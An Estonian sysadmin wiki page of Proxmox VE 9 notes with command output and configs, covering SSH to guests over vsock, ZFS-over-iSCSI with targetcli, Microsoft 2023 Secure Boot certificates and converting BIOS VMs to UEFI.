Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ettevalmistavalt tuleb 22/tcp seadistada käima ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194

root@zabbix-pub-01:~# systemctl status ssh.service
</pre>

Kusjuures vastav systemd ssh listen osakond jääb nagu on, 0.0.0.0/0 peale

<pre>
root@zabbix-pub-01:~# grep ^Lis /usr/lib/systemd/system/ssh.socket
ListenStream=0.0.0.0:22
</pre>

kus

* väidetavalt on see vajalik mingi sistemise systemd/ssh jne loogika toimimiseks.

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* tulemusena ta töötab, aga väga nö rahulikult

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T14:26:26Z

Imre: /* Üle vsock ssh kasutamine - Ubuntu 24.04 */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

